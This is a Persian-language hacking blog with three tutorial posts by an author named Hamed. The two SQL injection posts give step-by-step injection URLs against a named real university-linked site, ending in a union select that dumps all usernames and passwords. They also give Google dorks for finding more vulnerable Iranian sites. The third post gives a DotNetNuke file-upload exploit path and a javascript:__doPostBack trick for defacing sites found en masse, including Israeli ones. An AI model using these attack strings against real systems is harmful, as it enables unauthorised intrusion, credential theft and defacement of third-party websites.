๑۩۞۩๑ وحشتستان๑۩۞۩๑ هك آيدي

sql2

سلام دوستان عزیز .ببخشید که چند روزی نبودم .

همون طور که گقته بودم امروز هم قسمت دوم آموزش sql injection رو میگم .

تو این آموزش میخوام با یک مثال پیش بریم .پس لطفا به سایت آسیب نزنید .

سایت هدف ما : www.computersr.com (مال دانشگاه آزاد هست)

اگه وارد سایت بالا بشیم و روی یکی از لینکها کلیک کنیم .در انتهای لینکمون یک آیدی میاد و اگه جلوش یک کاراکتر غیر مجاز مثل ' بزاریم سایت ارور میده.

همون طور که در درس قبلی گفتم , اگر سایت ارور بده یعنی میشه هکش کرد .تو این سایت هم ارور داد .

لینک ارور= www.computersr.com/newsItem.php?id=277'

حالا طبق درس قبلی میاییم و با دستور order+by تعداد کالومن ها رو میاریم بیرون .

همان طور که گفته بودم غمل میکنم .: www.computersr.com/newsItem.php?id=-277+order+by+1--

خوب حالا اون عدد آخر که در بالا من یک دادم رو میبریم بالا تا جایی که ارور بده .که در این مثال اگر به جای یک 8 بدیم ارور میده سایت .

ولی اگر 7 بدیم سایت بدون هیچ اروری بالا میاد . پس تعداد کالومن این سایت 7 تا هست . حالا میایم و از دستور union +select استفاده میکنیم.

که میشه این : www.computersr.com/newsItem.php?id=-277+union+select+all+1,2,3,4,5,6,7--

همون طور که میبینید سایت به ما عدد 3 رو نشون میده .یعنی user و pass تو این کالومن هست .

حالا باید تیبیلی که userو pass توش هست رو حدس بزنیم . که در اینجا اسم تیبیل مورد نظر ما user هست . که باید با دستور from بازش کنیم .

که میشه اینجوری: www.computersr.com/newsItem.php?id=-277+union+select+all+1,2,3,4,5,6,7+from+user

خوب حالا باید به جای 3 اسم کالومن یوزر و پسورد رو بنویسیم . که در اینجا ما میخواهیم تمام یوزر و پسوردها رو بدست بیاریم و از دستور group_concat استفاده میکنیم.

که میشه اینجوری: www.computersr.com/newsItem.php?id=-277+union+select+all+1,2,group_concat(username,0x3a,password),4,5,6,7+from+user

حالا میپرسین که این 0x3a چی هست که نوشتی ؟ این دستور باعث میشه که بین یوزر و پسورد علامت : قرار بگیره و قاطی نشن.

اگر مشکلی داشتین تو نظرات بگین و من در اولین فرصت تو نظرات جوابش رو میگم .

و اگه خواستین بگین تا من مثالهای زیادتری بگم تا متوجه بشین . در پایان دوباره میگم لطفا به سایتی که در مثال گفته میشه آسیب نرسانید.

[+] نوشته شده توسط حامد در 6:9 بعد از ظهر | |

آموزش sql

سلام دوستان عزیز

تو این آموزش میخوام شما رو با حملات sql injection آشنا کنم ..

خوب برای شروع متن زیر رو تو گوگل سرچ کنین .

inurl:"news.php?id=" site:.ir

میبینید که گوگل سایتهای زیادی به ما داد که از sql استفاده میکنن . حالا باید تست کنیم که میشه هک کردیشون یا نه؟!!!!!!!!!!!

حالا سایت مورد نظر خودمون رو انتخاب میکنیم .

که میشه مثل این : www.site.com/news.php?id=2

حالا این عدد که من در اینجا 2 نوشتم متغیر هست واگه تو سایتی که شما انتخاب کردین .این عدد تغییر کرد تعجب نکنین .:D

حالا به آخر لینک که عدد نوشته شده کارکتر ' رو اضافه میکنیم .اگه سایت Error داد یعنی سایت مورد نظر ما مشکل داره .(البته این فقط یکی از راه هاست )

به فرض که سایت Error داد . حالا باید از دستورات sql استفاده کنیم . وتعداد ستونها و کلومن ها رو به دست بیاریم .

اولین دسور که باید استفاده کنیم دستور Order+by+x هست . که در اینجا x یک متغیر هست که باید به جاش یک عدد بنویسیم .

که میشه مثل این: www.site.com/news.php?id=-2+order+by+1--

خوب حالا این عدد که در این مثال من 1 رو نوشتم میتونه تغییر کنه .اول 1 رو وارد میکنیم اگر سایت بالا اومد 2 رو وارد کنیم و به همین صورت ادامه میدیم .

این کار رو تا جایی ادامه میدیم که سایت Error بده و بالا نیاد .خوب مثلا اگر زدیم 5 و سایت Error داد یعنی تعداد کلومن ما 4 تا هستش .

بعد از پیدا کردن کلومن ها باید از دستور union+select استفاده کنیم .

که برای مثال بالا میشه :+union+select+1,2,3,4-- www.site.com/news.php?id=-2

خوب اگر درست وارد کرده باشین سایت به شما چند تا عدد نشون میده مثلا 2و 3 رو نشون داد .

خوب اول باید ببینیم ورژن چی هستش که برای این کار باید به جای 2 یا 3 بنویسین version() که اگر ورژن پایین تر از 4 بود باید تیبیل ادمین رو حدس بزنین .

که ما فعلا فرض میکنیم که ورژن پایین تر از 4 هست .

حالا ما میایم به آخر لینکمون From+Tabel Name رو اضافه میکنیم . که به جای Tabel name باید اون چیزی که حدس زدیم رو بنویسیم .

به طور مثال یکی از اینها : user, admin,users,admins,login,...

خوب به طور مثال ما admin زدیم و سایت بالا اومد بدون هیچ error و همون عدد های 2 و 3 رو هم نشون داد .

حالا باید به جای 2و3 user va pass بنویسیم تا به جای اونا یوزر و پسورد سایت بیاد .

نکته : ما در مثال user,pass زدیم ممکنه در بعضی از سایتها اینها فرق کنن .

خوب دبگه خسته شدم برای این جلسه بسته اگه خوب بود بگین تا ادامه بدم

[+] نوشته شده توسط حامد در 11:8 قبل از ظهر | |

هک سایتها

سلام دوستان عزیز . چند ماهی نبودم .از به بعد سعی میکنم زود به زود وبلاگ رو آپ کنم .

این آموزش که میخوام بگم قدیمی هستش ولی بیشتر افراد نمیدونن .

در این آموزش میخوام شما رو با یک روشی آشنا کنم که با هاش میتونین بیش از 10000000 تا سایت رو هک کنید .

خوب برای این کار باید دورک زیر رو تو گوگل سرچ کنین .

inurl:"/portals/0" site:.ir

در این drok بالا شما میتونین ir رو عوض کنین و مثلا بزنین il که واسه اسراییل هستش .

وقتی سایتها رو سرچ کردین و پیدا کردین به آخر سایت لینک زیر رو اضافه میکنید .

Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

مثلا : www.site.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

حالا اگر سایت ما آسیبپذیر باشه سه تا گزینه میده و ما سومی رو انتخاب میکنیم . (برای ارسال فایل)

حالا میبینید که فایلهای سایت رو نشون میده ولی ما نمیتونیم چیزی آپلود کنیم .

برای این که ما چیزی آپلود کنیم باید لینک زیر رو به جای آدرس سایت بزنیم (تو آدرس بار)

javascript:__doPostBack('ctlURL$cmdUpload','')

خوب حالا میتونید فایل آپلود کنین ولی هر فایلی رو نه . مثلا نمیتونیم صفحه html یا php آپ کنیم .

خوب شما میتونین در یک فایل متنی بنویسید که سایت هک شد و آپلود کنین .

وقتی آپلود کردین آدرس فایل به صورت زیر خواهد شد .

www.site.com/portals/0/file name.txt

امیدوارم که خوشتون اومده باشه :D

[+] نوشته شده توسط حامد در 11:3 قبل از ظهر | |

:: مطالب پيشين